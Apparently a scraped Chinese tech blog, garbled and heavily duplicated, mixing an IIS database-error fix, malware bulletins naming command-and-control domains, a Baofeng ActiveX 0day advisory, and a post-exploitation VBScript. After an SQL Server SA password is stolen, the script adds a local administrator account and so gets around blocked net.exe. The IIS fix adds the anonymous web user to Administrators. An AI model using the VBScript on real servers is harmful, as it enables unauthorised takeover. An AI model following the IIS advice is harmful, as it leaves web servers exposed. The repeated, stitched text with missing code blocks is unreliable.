09:56
440
0
前些天调试一套整站! 提示:Microsoft JET Database Engine 错误 '80004005' 解决办法 !
当时又非常需要那个程序 所以在网上找了很多资料!
现在写一下解决方案 绝对有效!
一、IIS的来宾访问用户设置成管理员组,在计算机管理--用户中,找到IUSR_****,隶属于添加 administrators,然后需要重启IIS,看网站可以打开了不,把IIS的来宾访问用户设置成管理员!本地测试没关系的!
二、2、C:WindowsTemp 设置everyone或者user的写权限,推荐user此方法如果不行,那可能是环境变量没有设在
C:WindowsTemp
而是在:C:\Documents and Settings\administrator\Local Settings\ temp
把环境变量改了就没有问题了。当然 环境变量改了后 ,要重启计算机才行
当时又非常需要那个程序 所以在网上找了很多资料!
现在写一下解决方案 绝对有效!
一、IIS的来宾访问用户设置成管理员组,在计算机管理--用户中,找到IUSR_****,隶属于添加 administrators,然后需要重启IIS,看网站可以打开了不,把IIS的来宾访问用户设置成管理员!本地测试没关系的!
二、2、C:WindowsTemp 设置everyone或者user的写权限,推荐user此方法如果不行,那可能是环境变量没有设在
C:WindowsTemp
而是在:C:\Documents and Settings\administrator\Local Settings\ temp
把环境变量改了就没有问题了。当然 环境变量改了后 ,要重启计算机才行
“土匪”变种b
“土匪”Windows病毒家族中的最新成员之一,采用高级语言编写,并且经过加壳保护处理。
“土匪”变种b运行后,首先会将系统文件“explorer.exe”重新命名并保存到临时文件夹中,然后会在“explorer.exe”文件的尾部添加一个病毒代码节,以此进行感染,实现了开机后随桌面程序的启动而自动运行。
“土匪”变种b运行时,会在被感染计算机系统的后台连接骇客指定的远程服务器站点“http://tufei503.5*.net/”、“http://tufei503.home4u.chin*.com/”,下载恶意程序,分别重新命名为“AdvKey.dll”和“serial.dll”并自动调用运行。
另外,其还可能通过FTP的方式下载其它恶意程序至被感染系统。其中,所下载的恶意程序可能为网络游戏盗号木马、远程控制后门或其它恶意广告程序等,致使用户面临更多的威胁。
“土匪”变种b还会遍历磁盘上的可执行文件并进行感染,以此达到了自我传播的目的,但同时可能会导致用户在重装系统后再次受到病毒的侵害。由于病毒对可执行文件进行了不正确的读写操作,还可能导致大量的应用程序因此被破坏而无法运行。
“QQ诈骗犯”变种fx
“QQ诈骗犯”木马家族中的最新成员之一,采用“Borland Delphi 6.0-7.0”编写,并且经过加壳保护处理。
“QQ诈骗犯”变种fx是一个通过弹出仿冒“QQ”中奖消息窗口来诱骗用户上当,从而实施网络诈骗的木马程序。
“QQ诈骗犯”变种fx运行后,会将恶意代码注入到“explorer.exe”进程中隐密运行。遍历当前系统中所有正在运行的进程,一旦发现指定的安全软件存在时,便会尝试将其结束。利用文件映像劫持功能,干扰安全软件的正常运行,从而使得系统失去安全软件的防护,增加了遭受病毒侵害的风险。
“QQ诈骗犯”变种fx运行时,会在系统托盘区域模仿“QQ”广播的“喇叭”图标闪烁,用户点击后将弹出虚假的中奖提示窗口,进一步地将用户引导至钓鱼网站“http://www.qq.com.indl*.cn/”的指定页面并实施诈骗。
同时,该网站可能还存在网页挂马等恶意行为,从而使得被感染计算机用户面临更多的威胁。
“QQ诈骗犯”变种fx还会向骇客指定的站点“http://www.inds*.cn/”反馈用户的感染情况及计算机信息,并会通过在注册表启动项中添加键值“QQ10000”的方式来实现开机后的自动运行。
建议:
1、最好安装专业的杀毒软件进行全面监控并及时升级病毒代码库。建议用户将一些主要监控经常打开,如邮件监控、内存监控等,目的是防止目前盛行的病毒、木马、有害程序或代码等攻击用户计算机。
2、请勿随意打开邮件中的附件,尤其是来历不明的邮件。企业级用户可在通用的邮件服务器平台开启监控系统,在邮件网关处拦截病毒,确保邮件客户端的安全。
3、企业级用户应及时升级控制中心,并建议相关管理人员在适当时候进行全网查杀病毒。另外为保证企业信息安全,应关闭共享目录并为管理员帐户设置强口令,不要将管理员口令设置为空或过于简单的密码。
“土匪”Windows病毒家族中的最新成员之一,采用高级语言编写,并且经过加壳保护处理。
“土匪”变种b运行后,首先会将系统文件“explorer.exe”重新命名并保存到临时文件夹中,然后会在“explorer.exe”文件的尾部添加一个病毒代码节,以此进行感染,实现了开机后随桌面程序的启动而自动运行。
“土匪”变种b运行时,会在被感染计算机系统的后台连接骇客指定的远程服务器站点“http://tufei503.5*.net/”、“http://tufei503.home4u.chin*.com/”,下载恶意程序,分别重新命名为“AdvKey.dll”和“serial.dll”并自动调用运行。
另外,其还可能通过FTP的方式下载其它恶意程序至被感染系统。其中,所下载的恶意程序可能为网络游戏盗号木马、远程控制后门或其它恶意广告程序等,致使用户面临更多的威胁。
“土匪”变种b还会遍历磁盘上的可执行文件并进行感染,以此达到了自我传播的目的,但同时可能会导致用户在重装系统后再次受到病毒的侵害。由于病毒对可执行文件进行了不正确的读写操作,还可能导致大量的应用程序因此被破坏而无法运行。
“QQ诈骗犯”变种fx
“QQ诈骗犯”木马家族中的最新成员之一,采用“Borland Delphi 6.0-7.0”编写,并且经过加壳保护处理。
“QQ诈骗犯”变种fx是一个通过弹出仿冒“QQ”中奖消息窗口来诱骗用户上当,从而实施网络诈骗的木马程序。
“QQ诈骗犯”变种fx运行后,会将恶意代码注入到“explorer.exe”进程中隐密运行。遍历当前系统中所有正在运行的进程,一旦发现指定的安全软件存在时,便会尝试将其结束。利用文件映像劫持功能,干扰安全软件的正常运行,从而使得系统失去安全软件的防护,增加了遭受病毒侵害的风险。
“QQ诈骗犯”变种fx运行时,会在系统托盘区域模仿“QQ”广播的“喇叭”图标闪烁,用户点击后将弹出虚假的中奖提示窗口,进一步地将用户引导至钓鱼网站“http://www.qq.com.indl*.cn/”的指定页面并实施诈骗。
同时,该网站可能还存在网页挂马等恶意行为,从而使得被感染计算机用户面临更多的威胁。
“QQ诈骗犯”变种fx还会向骇客指定的站点“http://www.inds*.cn/”反馈用户的感染情况及计算机信息,并会通过在注册表启动项中添加键值“QQ10000”的方式来实现开机后的自动运行。
建议:
1、最好安装专业的杀毒软件进行全面监控并及时升级病毒代码库。建议用户将一些主要监控经常打开,如邮件监控、内存监控等,目的是防止目前盛行的病毒、木马、有害程序或代码等攻击用户计算机。
2、请勿随意打开邮件中的附件,尤其是来历不明的邮件。企业级用户可在通用的邮件服务器平台开启监控系统,在邮件网关处拦截病毒,确保邮件客户端的安全。
3、企业级用户应及时升级控制中心,并建议相关管理人员在适当时候进行全网查杀病毒。另外为保证企业信息安全,应关闭共享目录并为管理员帐户设置强口令,不要将管理员口令设置为空或过于简单的密码。
暴风0day漏洞描述:
当安装了暴风影音的用户在浏览黑客精心构造的包含恶意代码的网页后,可能导致漏洞触发,下载一个恶意木马下载器到受害者电脑,下载器成功运行后,受害者电脑即成为肉鸡,网游、QQ、局域网安全将遭受重大威胁。
临时解决办法:(禁用会导致暴风影音功能缺失)
目前厂商没有推出相应的补丁
建议用户通过注册表对相应的CLSID:BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05和CLSID:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB设置Killbit,或者将以下文本保存为.REG文件并导入:
附:
4月30日 国内安全研究者公布暴风影音ActiveX远程溢出漏洞
漏洞状态:0day 官方未修复
安全级别:危险
影响版本:暴风影音2009
漏洞公布的时间:2009-04-30
挂马集团利用的时间:2009-05-01
当安装了暴风影音的用户在浏览黑客精心构造的包含恶意代码的网页后,可能导致漏洞触发,下载一个恶意木马下载器到受害者电脑,下载器成功运行后,受害者电脑即成为肉鸡,网游、QQ、局域网安全将遭受重大威胁。
临时解决办法:(禁用会导致暴风影音功能缺失)
目前厂商没有推出相应的补丁
建议用户通过注册表对相应的CLSID:BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05和CLSID:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB设置Killbit,或者将以下文本保存为.REG文件并导入:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\
]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\
]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\
]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\
]
“Compatibility Flags”=dword:00000400
附:
4月30日 国内安全研究者公布暴风影音ActiveX远程溢出漏洞
漏洞状态:0day 官方未修复
安全级别:危险
影响版本:暴风影音2009
漏洞公布的时间:2009-04-30
挂马集团利用的时间:2009-05-01
最最在忙于网站方面的事情!前些天才找到一个网站比较好看的JS代码
当鼠标移动到导航菜单,在一定的位置出来子栏目!
效果参见:http://tongli.net/china/news.asp
JS代码:
当鼠标移动到导航菜单,在一定的位置出来子栏目!
效果参见:http://tongli.net/china/news.asp
JS代码:
在获得SA密码后,往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用,无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象,用来管理本地资源,利用它可以不依靠CMD等命令就能添加一个管理员,具体代码如下:
将上面的代码保存为sa.vbs,然后执行,命令为“cscript sa.vbs”,这样就会在系统添加一个系统名为xiangqiankun,密码为1234的用户。具体在查询分析器执行的代码如下:
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) '得到adsi接口,绑定
Set oe=GetObject(os&"/Administrators,group") '属性,admin组
Set od=ob.Create("user","xiangqiankun") '建立用户
od.SetPassword "1234" '设置密码
od.SetInfo '保存
Set of=GetObject(os&"/test",user) '得到用户
oe.add os&"/test"
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) '得到adsi接口,绑定
Set oe=GetObject(os&"/Administrators,group") '属性,admin组
Set od=ob.Create("user","xiangqiankun") '建立用户
od.SetPassword "1234" '设置密码
od.SetInfo '保存
Set of=GetObject(os&"/test",user) '得到用户
oe.add os&"/test"
将上面的代码保存为sa.vbs,然后执行,命令为“cscript sa.vbs”,这样就会在系统添加一个系统名为xiangqiankun,密码为1234的用户。具体在查询分析器执行的代码如下:
